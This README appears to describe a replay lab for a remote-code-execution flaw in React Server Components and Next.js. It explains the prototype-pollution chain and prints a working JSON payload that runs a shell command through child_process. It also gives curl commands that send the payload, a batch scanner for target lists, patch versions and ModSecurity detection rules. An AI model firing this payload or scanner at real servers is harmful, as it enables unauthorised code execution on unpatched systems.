Share
## https://sploitus.com/exploit?id=CC460830-412E-5C27-A749-74AED133BC40
# CVE-2025-55182 / CVE-2025-66478 Vulnerability Replay Environment

This is a minimal MVP environment for reproducing the React2Shell (CVE-2025-55182) and Next.js RSC RCE (CVE-2025-66478) vulnerabilities. ## โš ๏ธ Warning

**This project is intended only for security research and educational purposes. Do not use it in production environments or unauthorized systems.**

## Vulnerability Overview

CVE-2025-55182 is a serious vulnerability in React Server Components, affecting:
- **React**: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- **Next.js**: โ‰ฅ14.3.0-canary.77, โ‰ฅ15, โ‰ฅ16

An attacker can exploit the deserialization vulnerability of Flight Protocol through a specially crafted `multipart/form-data` request, achieving remote code execution (RCE). ### Attack Mechanism

1. **Obtaining Chunk References**: Using the `$@N` syntax to obtain internal Chunk objects.
2. **Prototype Chain Pollution**: Injecting malicious `then` methods through `$1:__proto__:then`.
3. **Triggering Execution**: The Server Action calls the polluted `then` method during `await`.
4. **Constructor Hijacking**: Hijacking `_formData.get` to a Function constructor.
5. **Code Execution**: Executing arbitrary code via Blob deserialization.

## Quick Start

### 1. Install Dependencies

```bash
npm install
# Or
yarn install
# Or
pnpm install
```

### 2. Start Development Server

```bash
npm run dev
```

The server will start at `http://localhost:3000`. ### 3. Test Vulnerabilities

Use the provided test scripts:

```bash
# Single target test
./test-exploit.sh http://localhost:3000

# Or directly with curl
curl -X POST http://localhost:3000/ \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
  --data-binary @exploit-payload.txt
```

If the vulnerability exists, you will see an output like `uid=` in the response (the result of executing the `id` command). ## File Structure

```
. โ”œโ”€โ”€ app/
โ”‚   โ”œโ”€โ”€ actions.ts              # Server Actions (vulnerability trigger point)
โ”‚   โ”œโ”€โ”€ page.tsx                # Main page
โ”‚   โ”œโ”€โ”€ layout.tsx              # Layout
โ”‚   โ””โ”€โ”€ globals.css             # Global styles
โ”œโ”€โ”€ package.json                # Dependency configuration (using affected versions)
โ”œโ”€โ”€ next.config.js              # Next.js configuration
โ”œโ”€โ”€ test-exploit.sh             # Single target vulnerability test script
โ”œโ”€โ”€ scan-targets.sh             # Batch scanning script
โ”œโ”€โ”€ exploit-payload.txt         # Exploit payload file
โ”œโ”€โ”€ Cve-2025-55182-modsecurity-rules.conf      # ModSecurity protection rules
โ””โ”€โ”€ README.md                   # Readme file
```

## Test Script Instructions

### 1. test-exploit.sh - Single Target Test

Test whether a single URL has a vulnerability:

```bash
chmod +x test-exploit.sh
./test-exploit.sh http://localhost:3000
```

**Feature**: If the response contains `uid=` or `gid=`, the vulnerability exists. ### 2. scan-targets.sh - Batch Scanning

Batch scan multiple target URLs:

```bash
# Create a list of targets
cat > targets.txt << EOF
http://localhost:3000
https://example.com
https://api.example.com:8080
EOF

# Execute batch scanning
chmod +x scan-targets.sh
./scan-targets.sh targets.txt
```

The scan results will be saved to `vulnerable_hosts.csv`. ## Payload Structure Analysis

```json
{
  "then": "$1:__proto__:then",           // Hijack the `then` method
  "status": "resolved_model",             // Control the execution path
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",      // Trigger Blob deserialization
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"  // Hijack as a Function
    }
  }
}
```

### Key Points:

1. **$@0**: References the first `form-data` field, obtaining the Chunk object.

2. **$1:__proto__:then**: Accessing Chunk.prototype.then  
3. **_response._prefix**: Injected malicious code (will be executed by the Function constructor)  
4. **$1:constructor:constructor**: Object.constructor.constructor = Function  

## Fix Solutions  

### Solution 1: Upgrade to a fixed version (recommended)  
- **React**: 19.0.1, 19.1.2, 19.2.1 or higher  
- **Next.js**: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 or higher  

```bash
npm install react@19.0.1 react-dom@19.0.1 next@15.0.5  
```  

### Solution 2: Deploy ModSecurity WAF rules (temporary mitigation)  
If an immediate upgrade is not possible, you can deploy ModSecurity rules for temporary protection.  
#### Apache + mod_security  
```bash  
# 1. Install mod_security  
sudo apt-get install libapache2-mod-security2  
# 2. Copy the rule file  
sudo cp modsecurity-rules.conf /etc/modsecurity/  
# 3. Add the rules to Apache configuration  
sudo vim /etc/apache2/mods-enabled/security2.conf  
# Add: Include /etc/modsecurity/modsecurity-rules.conf  
# 4. Restart Apache  
sudo systemctl restart apache2  
```  

#### Nginx + ModSecurity  
```bash  
# 1. Install ModSecurity for Nginx  
sudo apt-get install libnginx-mod-security  
# 2. Copy the rule file  
sudo cp modsecurity-rules.conf /etc/nginx/modsec/  
# 3. Enable the rules in Nginx configuration  
sudo vim /etc/nginx/nginx.conf  
# Add the following to the http or server block:  
# modsecurity on;  
# modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;  
# 4. Restart Nginx  
sudo systemctl restart nginx  
```  

#### Rules Detection Features  
ModSecurity rules detect the following features:  
- โœ… Flight Protocol features (`$@N`, `$BN`)  
- โœ… Prototype chain contamination (`__proto__`, `constructor:constructor`)  
- โœ… Dangerous Node.js module calls (`process.mainModule.require`, `require('child_process')`)  
- โœ… Command execution functions (`execSync`, `exec`)  
- โœ… Internal object operations (`_response`, `_chunks`, `_formData`, `_prefix`)  
- โœ… Server Action request headers (`Next-Action`, `RSC-Action-ID`)  

**โš ๏ธ Note**: WAF rules are only a temporary solution; a full protection requires upgrading to a fixed version.  
## Security Recommendations  

If your application may be affected:  
1. **Test immediately**: Use the `test-exploit.sh` script to test your application.  
2. **Upgrade immediately**: Update to a fixed version.  
3. **Rotate keys**: Rotate all environment variables, API keys, and database passwords.  
4. **Audit logs**: Check access logs for suspicious `Next-Action` requests.  
5. **Deploy WAF**: Deploy ModSecurity rules as a temporary protection before upgrading.  

## Quick Test with curl Command  

If you want to test directly using curl (without a script):  
```bash  
curl -X POST http://localhost:3000/ \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
  -H "X-Nextjs-Request-Id: b5dce965" \
  --data-binary @exploit-payload.txt  
```  

If the result includes `uid=` or `gid=`, it indicates a vulnerability exists.  
## References  
- [Vercel Official Bulletin](https://vercel.com/changelog/cve-2025-55182)  
- [React GHSA](https://github.com/facebook/react/security/advisories)  
- [Next.js GHSA](https://github.com/vercel/next.js/security/advisories)  
- [CVE PoC (React)](https://github.com/hzhsec/cve_2025_55182_test)  
- [CVE Scanner (Next.js)](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478)  
- [ModSecurity Documentation](https://github.com/SpiderLabs/ModSecurity)  

## Thanks  
- Lachlan Davidson โ€“ Identified and responsibly reported this vulnerability.  
- Meta Security & React Team  
- Vercel Team  

## License  

This project is intended for educational purposes only. Please comply with relevant laws when using this code.

[source-iocs-preserved url=http://localhost:3000`]